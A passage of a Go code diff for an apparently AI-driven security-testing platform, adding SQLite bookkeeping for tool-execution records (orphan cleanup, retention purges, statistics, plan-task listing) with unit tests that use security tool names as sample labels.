+ if userID == "" || executionID == "" { + return false + } + if scope == RBACScopeAll { + return true + } + var ownerUserID, conversationID sql.NullString + if err := db.QueryRow(`SELECT owner_user_id, conversation_id FROM tool_executions WHERE id = ?`, executionID).Scan(&ownerUserID, &conversationID); err != nil { + return false + } + if strings.TrimSpace(ownerUserID.String) == userID { + return true + } + conversation := strings.TrimSpace(conversationID.String) + return conversation != "" && db.UserCanAccessResource(userID, scope, "conversation", conversation) +} + +// CancelOrphanedRunningToolExecutions 将仍为 running 的记录批量标记为 orphaned(如进程重启后无对应执行协程)。 +func (db *DB) CancelOrphanedRunningToolExecutions(endTime time.Time, errMsg string) (int64, error) { + errMsg = strings.TrimSpace(errMsg) + if errMsg == "" { + errMsg = "执行已中断(服务重启或会话结束)" + } + query := ` + UPDATE tool_executions + SET status = 'orphaned', + error = ?, + end_time = ?, + duration_ms = MAX(0, CAST((julianday(?) - julianday(start_time)) * 86400000 AS INTEGER)) + WHERE status = 'running' + ` + res, err := db.Exec(query, errMsg, endTime, endTime) + if err != nil { + return 0, err + } + return res.RowsAffected() +} + +// FinalizeStaleRunningToolExecutions 将「非活跃且超过 minAge」的 running 记录标记为 orphaned。 +// activeIDs 为当前进程内仍登记 cancel 的 executionId;不在集合内且已超时的视为孤儿记录。 +func (db *DB) FinalizeStaleRunningToolExecutions(endTime time.Time, minAge time.Duration, activeIDs map[string]struct{}, errMsg string) (int64, error) { + errMsg = strings.TrimSpace(errMsg) + if errMsg == "" { + errMsg = "执行已中断(会话已结束)" + } + if minAge < 0 { + minAge = 0 + } + cutoff := endTime.Add(-minAge) + rows, err := db.Query(` + SELECT id, start_time FROM tool_executions + WHERE status = 'running' AND start_time <= ? + `, cutoff) + if err != nil { + return 0, err + } + defer rows.Close() + + type staleRow struct { + id string + startTime time.Time + } + var stale []staleRow + for rows.Next() { + var row staleRow + if err := rows.Scan(&row.id, &row.startTime); err != nil { + db.logger.Warn("读取 stale running 执行记录失败", zap.Error(err)) + continue + } + if activeIDs != nil { + if _, active := activeIDs[row.id]; active { + continue + } + } + stale = append(stale, row) + } + if err := rows.Err(); err != nil { + return 0, err + } + if len(stale) == 0 { + return 0, nil + } + + var affected int64 + for _, row := range stale { + durationMs := endTime.Sub(row.startTime).Milliseconds() + if durationMs < 0 { + durationMs = 0 + } + res, err := db.Exec(` + UPDATE tool_executions + SET status = 'orphaned', error = ?, end_time = ?, duration_ms = ? + WHERE id = ? AND status = 'running' + `, errMsg, endTime, durationMs, row.id) + if err != nil { + db.logger.Warn("更新 stale running 执行记录失败", zap.Error(err), zap.String("executionId", row.id)) + continue + } + n, _ := res.RowsAffected() + affected += n + } + return affected, nil +} + +// DeleteToolExecution 删除工具执行记录 +func (db *DB) DeleteToolExecution(id string) error { + query := `DELETE FROM tool_executions WHERE id = ?` + _, err := db.Exec(query, id) + if err != nil { + db.logger.Error("删除工具执行记录失败", zap.Error(err), zap.String("executionId", id)) + return err + } + return nil +} + +// DeleteToolExecutions 批量删除工具执行记录 +func (db *DB) DeleteToolExecutions(ids []string) error { + if len(ids) == 0 { + return nil + } + + // 构建 IN 查询的占位符 + placeholders := make([]string, len(ids)) + args := make([]interface{}, len(ids)) + for i, id := range ids { + placeholders[i] = "?" + args[i] = id + } + + query := `DELETE FROM tool_executions WHERE id IN (` + strings.Join(placeholders, ",") + `)` + _, err := db.Exec(query, args...) + if err != nil { + db.logger.Error("批量删除工具执行记录失败", zap.Error(err), zap.Int("count", len(ids))) + return err + } + return nil +} + +// GetToolExecutionsByIds 根据ID列表获取工具执行记录(用于批量删除前获取统计信息) +func (db *DB) GetToolExecutionsByIds(ids []string) ([]*mcp.ToolExecution, error) { + if len(ids) == 0 { + return []*mcp.ToolExecution{}, nil + } + + // 构建 IN 查询的占位符 + placeholders := make([]string, len(ids)) + args := make([]interface{}, len(ids)) + for i, id := range ids { + placeholders[i] = "?" + args[i] = id + } + + query := ` + SELECT id, tool_name, arguments, status, result, error, start_time, end_time, duration_ms, COALESCE(owner_user_id, ''), COALESCE(conversation_id, '') + FROM tool_executions + WHERE id IN (` + strings.Join(placeholders, ",") + `) + ` + + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + + var executions []*mcp.ToolExecution + for rows.Next() { + var exec mcp.ToolExecution + var argsJSON string + var resultJSON sql.NullString + var errorText sql.NullString + var endTime sql.NullTime + var durationMs sql.NullInt64 + + err := rows.Scan( + &exec.ID, + &exec.ToolName, + &argsJSON, + &exec.Status, + &resultJSON, + &errorText, + &exec.StartTime, + &endTime, + &durationMs, + &exec.OwnerUserID, + &exec.ConversationID, + ) + if err != nil { + db.logger.Warn("加载执行记录失败", zap.Error(err)) + continue + } + + // 解析参数 + if err := json.Unmarshal([]byte(argsJSON), &exec.Arguments); err != nil { + db.logger.Warn("解析执行参数失败", zap.Error(err)) + exec.Arguments = make(map[string]interface{}) + } + + // 解析结果 + if resultJSON.Valid && resultJSON.String != "" { + var result mcp.ToolResult + if err := json.Unmarshal([]byte(resultJSON.String), &result); err != nil { + db.logger.Warn("解析执行结果失败", zap.Error(err)) + } else { + exec.Result = &result + } + } + + // 设置错误 + if errorText.Valid { + exec.Error = errorText.String + } + + // 设置结束时间 + if endTime.Valid { + exec.EndTime = &endTime.Time + } + + // 设置持续时间 + if durationMs.Valid { + exec.Duration = time.Duration(durationMs.Int64) * time.Millisecond + } + + executions = append(executions, &exec) + } + + return executions, nil +} + +type toolExecutionStatDelta struct { + totalCalls int + successCalls int + failedCalls int +} + +// PurgeToolExecutionsBefore deletes executions older than cutoff and adjusts tool_stats. +func (db *DB) PurgeToolExecutionsBefore(cutoff time.Time) (int64, error) { + query := ` + SELECT tool_name, status, COUNT(*) AS cnt + FROM tool_executions + WHERE ` + sqliteEpochGE("start_time", "<") + ` + GROUP BY tool_name, status + ` + rows, err := db.Query(query, formatSQLiteUTC(cutoff)) + if err != nil { + return 0, err + } + defer rows.Close() + + deltas := make(map[string]*toolExecutionStatDelta) + for rows.Next() { + var toolName, status string + var count int + if err := rows.Scan(&toolName, &status, &count); err != nil { + db.logger.Warn("读取待清理执行记录统计失败", zap.Error(err)) + continue + } + toolName = strings.TrimSpace(toolName) + if toolName == "" || count <= 0 { + continue + } + delta := deltas[toolName] + if delta == nil { + delta = &toolExecutionStatDelta{} + deltas[toolName] = delta + } + delta.totalCalls += count + switch status { + case "failed", "hard_timeout", "orphaned": + delta.failedCalls += count + case "completed": + delta.successCalls += count + } + } + if err := rows.Err(); err != nil { + return 0, err + } + + res, err := db.Exec(`DELETE FROM tool_executions WHERE `+sqliteEpochGE("start_time", "<"), formatSQLiteUTC(cutoff)) + if err != nil { + return 0, err + } + deleted, err := res.RowsAffected() + if err != nil { + return 0, err + } + + for toolName, delta := range deltas { + if err := db.DecreaseToolStats(toolName, delta.totalCalls, delta.successCalls, delta.failedCalls); err != nil { + db.logger.Warn("清理过期执行记录后更新统计失败", + zap.Error(err), + zap.String("toolName", toolName), + ) + } + } + + return deleted, nil +} + +// SaveToolStats 保存工具统计信息 +func (db *DB) SaveToolStats(toolName string, stats *mcp.ToolStats) error { + var lastCallTime sql.NullTime + if stats.LastCallTime != nil { + lastCallTime = sql.NullTime{Time: *stats.LastCallTime, Valid: true} + } + + query := ` + INSERT OR REPLACE INTO tool_stats + (tool_name, total_calls, success_calls, failed_calls, last_call_time, updated_at) + VALUES (?, ?, ?, ?, ?, ?) + ` + + _, err := db.Exec(query, + toolName, + stats.TotalCalls, + stats.SuccessCalls, + stats.FailedCalls, + lastCallTime, + time.Now(), + ) + + if err != nil { + db.logger.Error("保存工具统计信息失败", zap.Error(err), zap.String("toolName", toolName)) + return err + } + + return nil +} + +// LoadToolStats 加载所有工具统计信息 +func (db *DB) LoadToolStats() (map[string]*mcp.ToolStats, error) { + query := ` + SELECT tool_name, total_calls, success_calls, failed_calls, last_call_time + FROM tool_stats + ` + + rows, err := db.Query(query) + if err != nil { + return nil, err + } + defer rows.Close() + + stats := make(map[string]*mcp.ToolStats) + for rows.Next() { + var stat mcp.ToolStats + var lastCallTime sql.NullTime + + err := rows.Scan( + &stat.ToolName, + &stat.TotalCalls, + &stat.SuccessCalls, + &stat.FailedCalls, + &lastCallTime, + ) + if err != nil { + db.logger.Warn("加载统计信息失败", zap.Error(err)) + continue + } + + if lastCallTime.Valid { + stat.LastCallTime = &lastCallTime.Time + } + + stats[stat.ToolName] = &stat + } + + return stats, nil +} + +// UpdateToolStats 更新工具统计信息(累加模式) +func (db *DB) UpdateToolStats(toolName string, totalCalls, successCalls, failedCalls int, lastCallTime *time.Time) error { + var lastCallTimeSQL sql.NullTime + if lastCallTime != nil { + lastCallTimeSQL = sql.NullTime{Time: *lastCallTime, Valid: true} + } + + query := ` + INSERT INTO tool_stats (tool_name, total_calls, success_calls, failed_calls, last_call_time, updated_at) + VALUES (?, ?, ?, ?, ?, ?) + ON CONFLICT(tool_name) DO UPDATE SET + total_calls = total_calls + ?, + success_calls = success_calls + ?, + failed_calls = failed_calls + ?, + last_call_time = COALESCE(?, last_call_time), + updated_at = ? + ` + + _, err := db.Exec(query, + toolName, totalCalls, successCalls, failedCalls, lastCallTimeSQL, time.Now(), + totalCalls, successCalls, failedCalls, lastCallTimeSQL, time.Now(), + ) + + if err != nil { + db.logger.Error("更新工具统计信息失败", zap.Error(err), zap.String("toolName", toolName)) + return err + } + + return nil +} + +// CallsTimelineBucket 调用趋势时间桶 +type CallsTimelineBucket struct { + BucketTime time.Time + Total int + Failed int +} + +// truncateCallsTimelineBucket 将时间截断到趋势图桶边界(本地时区,与 handler 侧 truncateToBucket 一致) +func truncateCallsTimelineBucket(t time.Time, dailyBuckets bool) time.Time { + t = t.In(time.Local) + if dailyBuckets { + y, m, d := t.Date() + return time.Date(y, m, d, 0, 0, 0, 0, time.Local) + } + return t.Truncate(time.Hour) +} + +// LoadCallsTimeline 按时间范围加载调用趋势(since 起至今,含边界) +func (db *DB) LoadCallsTimeline(since time.Time, dailyBuckets bool) ([]CallsTimelineBucket, error) { + var query string + if dailyBuckets { + query = ` + SELECT date(start_time, 'localtime') AS bucket, + COUNT(*) AS total, + SUM(CASE WHEN status IN ('failed', 'hard_timeout', 'orphaned') THEN 1 ELSE 0 END) AS failed + FROM tool_executions + WHERE start_time >= ? + GROUP BY bucket + ORDER BY bucket + ` + } else { + query = ` + SELECT strftime('%Y-%m-%d %H:00:00', start_time, 'localtime') AS bucket, + COUNT(*) AS total, + SUM(CASE WHEN status IN ('failed', 'hard_timeout', 'orphaned') THEN 1 ELSE 0 END) AS failed + FROM tool_executions + WHERE start_time >= ? + GROUP BY bucket + ORDER BY bucket + ` + } + + rows, err := db.Query(query, since) + if err != nil { + return nil, err + } + defer rows.Close() + + buckets := make([]CallsTimelineBucket, 0) + for rows.Next() { + var bucketStr string + var total, failed int + if err := rows.Scan(&bucketStr, &total, &failed); err != nil { + db.logger.Warn("加载调用趋势失败", zap.Error(err)) + continue + } + bucketTime, err := parseCallsTimelineBucket(bucketStr, dailyBuckets) + if err != nil { + db.logger.Warn("解析调用趋势时间桶失败", zap.Error(err), zap.String("bucket", bucketStr)) + continue + } + buckets = append(buckets, CallsTimelineBucket{ + BucketTime: bucketTime, + Total: total, + Failed: failed, + }) + } + return buckets, nil +} + +func parseCallsTimelineBucket(bucketStr string, dailyBuckets bool) (time.Time, error) { + if dailyBuckets { + return time.ParseInLocation("2006-01-02", bucketStr, time.Local) + } + return time.ParseInLocation("2006-01-02 15:04:05", bucketStr, time.Local) +} + +// DecreaseToolStats 减少工具统计信息(用于删除执行记录时) +// 如果统计信息变为0,则删除该统计记录 +func (db *DB) DecreaseToolStats(toolName string, totalCalls, successCalls, failedCalls int) error { + // 先更新统计信息 + query := ` + UPDATE tool_stats SET + total_calls = CASE WHEN total_calls - ? < 0 THEN 0 ELSE total_calls - ? END, + success_calls = CASE WHEN success_calls - ? < 0 THEN 0 ELSE success_calls - ? END, + failed_calls = CASE WHEN failed_calls - ? < 0 THEN 0 ELSE failed_calls - ? END, + updated_at = ? + WHERE tool_name = ? + ` + + _, err := db.Exec(query, totalCalls, totalCalls, successCalls, successCalls, failedCalls, failedCalls, time.Now(), toolName) + if err != nil { + db.logger.Error("减少工具统计信息失败", zap.Error(err), zap.String("toolName", toolName)) + return err + } + + // 检查更新后的 total_calls 是否为 0,如果是则删除该统计记录 + checkQuery := `SELECT total_calls FROM tool_stats WHERE tool_name = ?` + var newTotalCalls int + err = db.QueryRow(checkQuery, toolName).Scan(&newTotalCalls) + if err != nil { + // 如果查询失败(记录不存在),直接返回 + return nil + } + + // 如果 total_calls 为 0,删除该统计记录 + if newTotalCalls == 0 { + deleteQuery := `DELETE FROM tool_stats WHERE tool_name = ?` + _, err = db.Exec(deleteQuery, toolName) + if err != nil { + db.logger.Warn("删除零统计记录失败", zap.Error(err), zap.String("toolName", toolName)) + // 不返回错误,因为主要操作(更新统计)已成功 + } else { + db.logger.Info("已删除零统计记录", zap.String("toolName", toolName)) + } + } + + return nil +} diff --git a/internal/database/monitor_reconcile_test.go b/internal/database/monitor_reconcile_test.go new file mode 100644 index 00000000..72e60d6c --- /dev/null +++ b/internal/database/monitor_reconcile_test.go @@ -0,0 +1,102 @@ +package database + +import ( + "path/filepath" + "testing" + "time" + + "cyberstrike-ai/internal/mcp" + + "go.uber.org/zap" +) + +func TestCancelOrphanedRunningToolExecutions(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "monitor.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + start := time.Now().Add(-2 * time.Hour) + exec := &mcp.ToolExecution{ + ID: "orphan-hydra", + ToolName: "hydra", + Arguments: map[string]interface{}{"target": "127.0.0.1"}, + Status: "running", + StartTime: start, + } + if err := db.SaveToolExecution(exec); err != nil { + t.Fatalf("SaveToolExecution: %v", err) + } + + end := time.Now() + n, err := db.CancelOrphanedRunningToolExecutions(end, "执行已中断(服务重启)") + if err != nil { + t.Fatalf("CancelOrphanedRunningToolExecutions: %v", err) + } + if n != 1 { + t.Fatalf("expected 1 row updated, got %d", n) + } + + got, err := db.GetToolExecution("orphan-hydra") + if err != nil { + t.Fatalf("GetToolExecution: %v", err) + } + if got.Status != "orphaned" { + t.Fatalf("expected orphaned, got %s", got.Status) + } + if got.EndTime == nil { + t.Fatal("expected end_time to be set") + } + if got.Duration <= 0 { + t.Fatalf("expected positive duration, got %v", got.Duration) + } +} + +func TestFinalizeStaleRunningToolExecutions_skipsActive(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "monitor.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + now := time.Now() + oldStart := now.Add(-5 * time.Minute) + if err := db.SaveToolExecution(&mcp.ToolExecution{ + ID: "stale", ToolName: "hydra", Status: "running", StartTime: oldStart, + }); err != nil { + t.Fatalf("SaveToolExecution stale: %v", err) + } + if err := db.SaveToolExecution(&mcp.ToolExecution{ + ID: "active", ToolName: "hydra", Status: "running", StartTime: oldStart, + }); err != nil { + t.Fatalf("SaveToolExecution active: %v", err) + } + + active := map[string]struct{}{"active": {}} + n, err := db.FinalizeStaleRunningToolExecutions(now, time.Minute, active, "执行已中断(会话已结束)") + if err != nil { + t.Fatalf("FinalizeStaleRunningToolExecutions: %v", err) + } + if n != 1 { + t.Fatalf("expected 1 stale row updated, got %d", n) + } + + stale, err := db.GetToolExecution("stale") + if err != nil { + t.Fatalf("GetToolExecution stale: %v", err) + } + if stale.Status != "orphaned" { + t.Fatalf("stale expected orphaned, got %s", stale.Status) + } + + activeExec, err := db.GetToolExecution("active") + if err != nil { + t.Fatalf("GetToolExecution active: %v", err) + } + if activeExec.Status != "running" { + t.Fatalf("active expected running, got %s", activeExec.Status) + } +} diff --git a/internal/database/monitor_retention_test.go b/internal/database/monitor_retention_test.go new file mode 100644 index 00000000..20de7cad --- /dev/null +++ b/internal/database/monitor_retention_test.go @@ -0,0 +1,122 @@ +package database + +import ( + "path/filepath" + "testing" + "time" + + "cyberstrike-ai/internal/mcp" + + "go.uber.org/zap" +) + +func TestPurgeToolExecutionsBefore(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "monitor.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + oldStart := time.Now().AddDate(0, 0, -100) + newStart := time.Now().AddDate(0, 0, -1) + + oldExec := &mcp.ToolExecution{ + ID: "old-completed", + ToolName: "nmap::scan", + Arguments: map[string]interface{}{"target": "127.0.0.1"}, + Status: "completed", + StartTime: oldStart, + } + oldFailed := &mcp.ToolExecution{ + ID: "old-failed", + ToolName: "nmap::scan", + Arguments: map[string]interface{}{"target": "127.0.0.1"}, + Status: "failed", + Error: "timeout", + StartTime: oldStart, + } + newExec := &mcp.ToolExecution{ + ID: "new-completed", + ToolName: "nmap::scan", + Arguments: map[string]interface{}{"target": "127.0.0.1"}, + Status: "completed", + StartTime: newStart, + } + for _, exec := range []*mcp.ToolExecution{oldExec, oldFailed, newExec} { + if err := db.SaveToolExecution(exec); err != nil { + t.Fatalf("SaveToolExecution(%s): %v", exec.ID, err) + } + } + if err := db.UpdateToolStats("nmap::scan", 3, 2, 1, &newStart); err != nil { + t.Fatalf("UpdateToolStats: %v", err) + } + + cutoff := time.Now().AddDate(0, 0, -90) + deleted, err := db.PurgeToolExecutionsBefore(cutoff) + if err != nil { + t.Fatalf("PurgeToolExecutionsBefore: %v", err) + } + if deleted != 2 { + t.Fatalf("deleted = %d, want 2", deleted) + } + + if _, err := db.GetToolExecution("old-completed"); err == nil { + t.Fatal("old-completed should be deleted") + } + if _, err := db.GetToolExecution("old-failed"); err == nil { + t.Fatal("old-failed should be deleted") + } + if _, err := db.GetToolExecution("new-completed"); err != nil { + t.Fatalf("new-completed should remain: %v", err) + } + + stats, err := db.LoadToolStats() + if err != nil { + t.Fatalf("LoadToolStats: %v", err) + } + stat := stats["nmap::scan"] + if stat == nil { + t.Fatal("expected stats for nmap::scan") + } + if stat.TotalCalls != 1 || stat.SuccessCalls != 1 || stat.FailedCalls != 0 { + t.Fatalf("stats after purge = %+v, want total=1 success=1 failed=0", stat) + } + + total, err := db.CountToolExecutions("", "") + if err != nil { + t.Fatalf("CountToolExecutions: %v", err) + } + if total != 1 { + t.Fatalf("remaining executions = %d, want 1", total) + } +} + +func TestPurgeToolExecutionsBefore_zeroRetentionSkipsViaService(t *testing.T) { + // RetentionDaysEffective: 0 means no purge at service layer; DB method still works when called directly. + dbPath := filepath.Join(t.TempDir(), "monitor.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + exec := &mcp.ToolExecution{ + ID: "ancient", + ToolName: "curl::get", + Arguments: map[string]interface{}{}, + Status: "completed", + StartTime: time.Now().AddDate(-1, 0, 0), + } + if err := db.SaveToolExecution(exec); err != nil { + t.Fatalf("SaveToolExecution: %v", err) + } + + deleted, err := db.PurgeToolExecutionsBefore(time.Now()) + if err != nil { + t.Fatalf("PurgeToolExecutionsBefore: %v", err) + } + if deleted != 1 { + t.Fatalf("deleted = %d, want 1", deleted) + } +} diff --git a/internal/database/monitor_summary_test.go b/internal/database/monitor_summary_test.go new file mode 100644 index 00000000..f7fcbf4d --- /dev/null +++ b/internal/database/monitor_summary_test.go @@ -0,0 +1,132 @@ +package database + +import ( + "fmt" + "path/filepath" + "testing" + "time" + + "cyberstrike-ai/internal/mcp" + + "go.uber.org/zap" +) + +func TestLoadToolStatsSummaryAndListPage(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "monitor-summary.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + now := time.Now() + tools := []struct { + name string + calls int + ok int + fail int + result string + }{ + {"alpha::run", 10, 9, 1, `{"content":[{"type":"text","text":"` + string(make([]byte, 64*1024)) + `"}]}`}, + {"beta::scan", 5, 5, 0, `{"content":[{"type":"text","text":"ok"}]}`}, + {"gamma::ping", 1, 1, 0, `{"content":[{"type":"text","text":"pong"}]}`}, + } + + for _, tool := range tools { + if err := db.UpdateToolStats(tool.name, tool.calls, tool.ok, tool.fail, &now); err != nil { + t.Fatalf("UpdateToolStats(%s): %v", tool.name, err) + } + for j := 0; j < tool.calls; j++ { + exec := &mcp.ToolExecution{ + ID: fmt.Sprintf("%s-exec-%d", tool.name, j), + ToolName: tool.name, + Arguments: map[string]interface{}{"n": j}, + Status: "completed", + StartTime: now.Add(-time.Duration(j) * time.Minute), + Result: &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: tool.result}}}, + } + end := exec.StartTime.Add(time.Second) + exec.EndTime = &end + exec.Duration = time.Second + if err := db.SaveToolExecution(exec); err != nil { + t.Fatalf("SaveToolExecution: %v", err) + } + } + } + + summary, err := db.LoadToolStatsSummary(2) + if err != nil { + t.Fatalf("LoadToolStatsSummary: %v", err) + } + if summary.Summary.ToolCount != 3 { + t.Fatalf("toolCount = %d, want 3", summary.Summary.ToolCount) + } + if summary.Summary.TotalCalls != 16 { + t.Fatalf("totalCalls = %d, want 16", summary.Summary.TotalCalls) + } + if len(summary.TopTools) != 2 { + t.Fatalf("top tools = %d, want 2", len(summary.TopTools)) + } + if summary.TopTools[0].ToolName != "alpha::run" { + t.Fatalf("top tool = %q, want alpha::run", summary.TopTools[0].ToolName) + } + + list, err := db.LoadToolExecutionListPage(0, 5, "", "") + if err != nil { + t.Fatalf("LoadToolExecutionListPage: %v", err) + } + if len(list) != 5 { + t.Fatalf("list len = %d, want 5", len(list)) + } + for _, exec := range list { + if exec.Arguments != nil || exec.Result != nil || exec.Error != "" { + t.Fatalf("expected lite execution row, got args/result/error on %s", exec.ID) + } + } +} + +func TestLoadToolStatsSummaryDoesNotCountCancelledAsFailed(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "monitor-cancelled-summary.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + + now := time.Now() + for i, status := range []string{"completed", "cancelled", "failed"} { + exec := &mcp.ToolExecution{ + ID: fmt.Sprintf("exec-%d", i), + ToolName: "exec", + Arguments: map[string]interface{}{}, + Status: status, + StartTime: now.Add(time.Duration(i) * time.Second), + } + end := exec.StartTime.Add(time.Second) + exec.EndTime = &end + exec.Duration = time.Second + if err := db.SaveToolExecution(exec); err != nil { + t.Fatalf("SaveToolExecution(%s): %v", status, err) + } + } + + summary, err := db.LoadToolStatsSummary(1) + if err != nil { + t.Fatalf("LoadToolStatsSummary: %v", err) + } + if summary.Summary.TotalCalls != 3 { + t.Fatalf("totalCalls = %d, want 3", summary.Summary.TotalCalls) + } + if summary.Summary.SuccessCalls != 1 { + t.Fatalf("successCalls = %d, want 1", summary.Summary.SuccessCalls) + } + if summary.Summary.FailedCalls != 1 { + t.Fatalf("failedCalls = %d, want 1", summary.Summary.FailedCalls) + } + if len(summary.TopTools) != 1 { + t.Fatalf("top tools = %d, want 1", len(summary.TopTools)) + } + if summary.TopTools[0].FailedCalls != 1 { + t.Fatalf("top tool failedCalls = %d, want 1", summary.TopTools[0].FailedCalls) + } +} diff --git a/internal/database/plantask.go b/internal/database/plantask.go new file mode 100644 index 00000000..a64feaa8 --- /dev/null +++ b/internal/database/plantask.go @@ -0,0 +1,125 @@ +package database + +import ( + "encoding/json" + "fmt" + "os" + "path/filepath" + "sort" + "strconv" + "strings" + "time" + + "go.uber.org/zap" +) + +// ConversationPlanTask mirrors the public fields persisted by Eino plantask. +// Keeping the transport model here avoids coupling the HTTP layer to Eino's +// private task type. +type ConversationPlanTask struct { + ID string `json:"id"` + Subject string `json:"subject"` + Description string `json:"description,omitempty"` + Status string `json:"status"` + Blocks []string `json:"blocks,omitempty"` + BlockedBy []string `json:"blockedBy,omitempty"` + ActiveForm string `json:"activeForm,omitempty"` + Owner string `json:"owner,omitempty"` +} + +// ListConversationPlanTasks returns the live Eino task board for one +// conversation. A missing task directory is the normal state for short or +// legacy conversations and therefore returns an empty list. +func (db *DB) ListConversationPlanTasks(conversationID string) ([]ConversationPlanTask, error) { + return db.ListConversationPlanTasksSince(conversationID, time.Time{}) +} + +// ListConversationPlanTasksSince limits the board to files written during the +// current agent run. The Eino backend intentionally keeps older task files for +// model continuity, but the conversation UI must not surface those files before +// the new run has called TaskCreate. +func (db *DB) ListConversationPlanTasksSince(conversationID string, since time.Time) ([]ConversationPlanTask, error) { + if db == nil { + return []ConversationPlanTask{}, nil + } + conversationID = strings.TrimSpace(conversationID) + if conversationID == "" { + return nil, fmt.Errorf("conversation id is required") + } + base := strings.TrimSpace(db.einoPlantaskBaseDir) + if base == "" { + return []ConversationPlanTask{}, nil + } + + dir := filepath.Join(base, sanitizeConversationPathSegment(conversationID)) + entries, err := os.ReadDir(dir) + if os.IsNotExist(err) { + return []ConversationPlanTask{}, nil + } + if err != nil { + return nil, fmt.Errorf("read conversation plan tasks: %w", err) + } + + type numberedTask struct { + number int + task ConversationPlanTask + } + numbered := make([]numberedTask, 0, len(entries)) + for _, entry := range entries { + if entry.IsDir() || filepath.Ext(entry.Name()) != ".json" { + continue + } + idText := strings.TrimSuffix(entry.Name(), ".json") + number, parseErr := strconv.Atoi(idText) + if parseErr != nil || number < 1 { + continue + } + if !since.IsZero() { + info, infoErr := entry.Info() + if infoErr != nil { + continue + } + if info.ModTime().Before(since) { + continue + } + } + content, readErr := os.ReadFile(filepath.Join(dir, entry.Name())) + if readErr != nil { + if db.logger != nil { + db.logger.Debug("读取 Eino 任务文件失败", + zap.String("conversationId", conversationID), + zap.String("file", entry.Name()), + zap.Error(readErr)) + } + continue + } + var task ConversationPlanTask + if decodeErr := json.Unmarshal(content, &task); decodeErr != nil { + // TaskUpdate writes files concurrently with this read. A partial read + // is transient, so skip it and let the next poll recover. + if db.logger != nil { + db.logger.Debug("解析 Eino 任务文件失败", + zap.String("conversationId", conversationID), + zap.String("file", entry.Name()), + zap.Error(decodeErr)) + } + continue + } + if strings.TrimSpace(task.ID) == "" { + task.ID = idText + } + if strings.EqualFold(strings.TrimSpace(task.Status), "deleted") { + continue + } + numbered = append(numbered, numberedTask{number: number, task: task}) + } + + sort.SliceStable(numbered, func(i, j int) bool { + return numbered[i].number < numbered[j].number + }) + tasks := make([]ConversationPlanTask, 0, len(numbered)) + for _, item := range numbered { + tasks = append(tasks, item.task) + } + return tasks, nil +} diff --git a/internal/database/plantask_test.go b/internal/database/plantask_test.go new file mode 100644 index 00000000..6efe59e4 --- /dev/null +++ b/internal/database/plantask_test.go @@ -0,0 +1,104 @@ +package database + +import ( + "os" + "path/filepath" + "testing" + "time" + + "go.uber.org/zap" +) + +func TestListConversationPlanTasksSortedAndToleratesMissingDirectory(t *testing.T) { + tmp := t.TempDir() + db, err := NewDB(filepath.Join(tmp, "plantask.db"), zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + t.Cleanup(func() { _ = db.Close() }) + + base := filepath.Join(tmp, "skills", ".eino", "plantask") + db.SetEinoConversationDirs(base, "", "", "") + missing, err := db.ListConversationPlanTasks("missing") + if err != nil || len(missing) != 0 { + t.Fatalf("missing task board = %#v, err=%v", missing, err) + } + + dir := filepath.Join(base, "conversation-1") + if err := os.MkdirAll(dir, 0o755); err != nil { + t.Fatalf("MkdirAll: %v", err) + } + files := map[string]string{ + "10.json": `{"id":"10","subject":"最后检查","status":"pending"}`, + "2.json": `{"id":"2","subject":"实现接口","status":"in_progress","activeForm":"正在实现接口"}`, + "1.json": `{"id":"1","subject":"梳理需求","status":"completed"}`, + "bad.json": `{`, + } + for name, content := range files { + if err := os.WriteFile(filepath.Join(dir, name), []byte(content), 0o644); err != nil { + t.Fatalf("WriteFile(%s): %v", name, err) + } + } + if err := os.WriteFile(filepath.Join(dir, ".highwatermark"), []byte("10"), 0o644); err != nil { + t.Fatalf("WriteFile(highwatermark): %v", err) + } + + tasks, err := db.ListConversationPlanTasks("conversation-1") + if err != nil { + t.Fatalf("ListConversationPlanTasks: %v", err) + } + if len(tasks) != 3 { + t.Fatalf("tasks = %#v, want 3", tasks) + } + if tasks[0].ID != "1" || tasks[1].ID != "2" || tasks[2].ID != "10" { + t.Fatalf("task order = %q, %q, %q", tasks[0].ID, tasks[1].ID, tasks[2].ID) + } + if tasks[1].ActiveForm != "正在实现接口" { + t.Fatalf("activeForm = %q", tasks[1].ActiveForm) + } +} + +func TestListConversationPlanTasksSinceHidesPreviousRunUntilTaskCreate(t *testing.T) { + tmp := t.TempDir() + db, err := NewDB(filepath.Join(tmp, "plantask-current-run.db"), zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + t.Cleanup(func() { _ = db.Close() }) + + base := filepath.Join(tmp, "plantask") + db.SetEinoConversationDirs(base, "", "", "") + dir := filepath.Join(base, "conversation-current-run") + if err := os.MkdirAll(dir, 0o755); err != nil { + t.Fatalf("MkdirAll: %v", err) + } + oldPath := filepath.Join(dir, "1.json") + if err := os.WriteFile(oldPath, []byte(`{"id":"1","subject":"上一轮任务","status":"in_progress"}`), 0o644); err != nil { + t.Fatalf("WriteFile(old): %v", err) + } + runStartedAt := time.Now().Add(-time.Second) + oldTime := runStartedAt.Add(-time.Minute) + if err := os.Chtimes(oldPath, oldTime, oldTime); err != nil { + t.Fatalf("Chtimes(old): %v", err) + } + + tasks, err := db.ListConversationPlanTasksSince("conversation-current-run", runStartedAt) + if err != nil { + t.Fatalf("ListConversationPlanTasksSince(before TaskCreate): %v", err) + } + if len(tasks) != 0 { + t.Fatalf("stale tasks shown before current TaskCreate: %#v", tasks) + } + + newPath := 